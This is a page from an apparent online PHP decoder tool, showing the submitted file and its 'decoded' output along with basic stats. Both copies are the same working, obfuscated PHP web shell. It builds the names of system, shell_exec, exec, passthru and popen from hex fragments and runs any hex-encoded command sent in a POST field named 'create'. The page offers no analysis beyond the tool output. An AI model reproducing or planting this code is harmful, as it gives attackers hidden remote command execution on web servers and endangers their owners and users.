Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $stor1 = '79';$stor2 = '74';$stor3 = '6d';$..
Decoded Output download
<?php $stor1 = '79';$stor2 = '74';$stor3 = '6d';$stor4 = '73';$stor5 = '68';$stor6 = '6c';$stor7 = '5f';$stor8 = '65';$stor9 = '63';$stor10 = '70';$stor11 = '61';$stor12 = '72';$stor13 = '6e';$stor14 = '67';$stor15 = '6f';$stor16 = '64';$post1 = pack("H*", '73' . $stor1 . '73' . $stor2 . '65' . $stor3);$post2 = pack("H*", $stor4 . $stor5 . '65' . $stor6 . '6c' . $stor7 . '65' . '78' . $stor8 . '63');$post3 = pack("H*", '65' . '78' . $stor8 . $stor9);$post4 = pack("H*", $stor10 . $stor11 . '73' . '73' . '74' . '68' . $stor12 . '75');$post5 = pack("H*", $stor10 . '6f' . $stor10 . $stor8 . $stor13);$post6 = pack("H*", '73' . $stor2 . '72' . $stor8 . $stor11 . '6d' . $stor7 . $stor14 . '65' . $stor2 . '5f' . $stor9 . $stor15 . $stor13 . $stor2 . '65' . '6e' . '74' . '73');$post7 = pack("H*", $stor10 . '63' . $stor6 . $stor15 . $stor4 . $stor8);$created = pack("H*", $stor9 . '72' . $stor8 . $stor11 . '74' . '65' . $stor16);if(isset($_POST[$created])){$created=pack("H*",$_POST[$created]);if(function_exists($post1)){$post1($created);}elseif(function_exists($post2)){print $post2($created);}elseif(function_exists($post3)){$post3($created,$attr_slot);print join("
",$attr_slot);}elseif(function_exists($post4)){$post4($created);}elseif(function_exists($post5)&&function_exists($post6)&&function_exists($post7)){$storage_placeholder=$post5($created,"r");if($storage_placeholder){$id_prop=$post6($storage_placeholder);$post7($storage_placeholder);print $id_prop;}}exit;} ?>
Did this file decode correctly?
Original Code
<?php $stor1 = '79';$stor2 = '74';$stor3 = '6d';$stor4 = '73';$stor5 = '68';$stor6 = '6c';$stor7 = '5f';$stor8 = '65';$stor9 = '63';$stor10 = '70';$stor11 = '61';$stor12 = '72';$stor13 = '6e';$stor14 = '67';$stor15 = '6f';$stor16 = '64';$post1 = pack("H*", '73' . $stor1 . '73' . $stor2 . '65' . $stor3);$post2 = pack("H*", $stor4 . $stor5 . '65' . $stor6 . '6c' . $stor7 . '65' . '78' . $stor8 . '63');$post3 = pack("H*", '65' . '78' . $stor8 . $stor9);$post4 = pack("H*", $stor10 . $stor11 . '73' . '73' . '74' . '68' . $stor12 . '75');$post5 = pack("H*", $stor10 . '6f' . $stor10 . $stor8 . $stor13);$post6 = pack("H*", '73' . $stor2 . '72' . $stor8 . $stor11 . '6d' . $stor7 . $stor14 . '65' . $stor2 . '5f' . $stor9 . $stor15 . $stor13 . $stor2 . '65' . '6e' . '74' . '73');$post7 = pack("H*", $stor10 . '63' . $stor6 . $stor15 . $stor4 . $stor8);$created = pack("H*", $stor9 . '72' . $stor8 . $stor11 . '74' . '65' . $stor16);if(isset($_POST[$created])){$created=pack("H*",$_POST[$created]);if(function_exists($post1)){$post1($created);}elseif(function_exists($post2)){print $post2($created);}elseif(function_exists($post3)){$post3($created,$attr_slot);print join("\n",$attr_slot);}elseif(function_exists($post4)){$post4($created);}elseif(function_exists($post5)&&function_exists($post6)&&function_exists($post7)){$storage_placeholder=$post5($created,"r");if($storage_placeholder){$id_prop=$post6($storage_placeholder);$post7($storage_placeholder);print $id_prop;}}exit;}
Function Calls
pack | 9 |
Stats
MD5 | 23f4a525141b30ec7dd438ab8dd691b6 |
Eval Count | 0 |
Decode Time | 193 ms |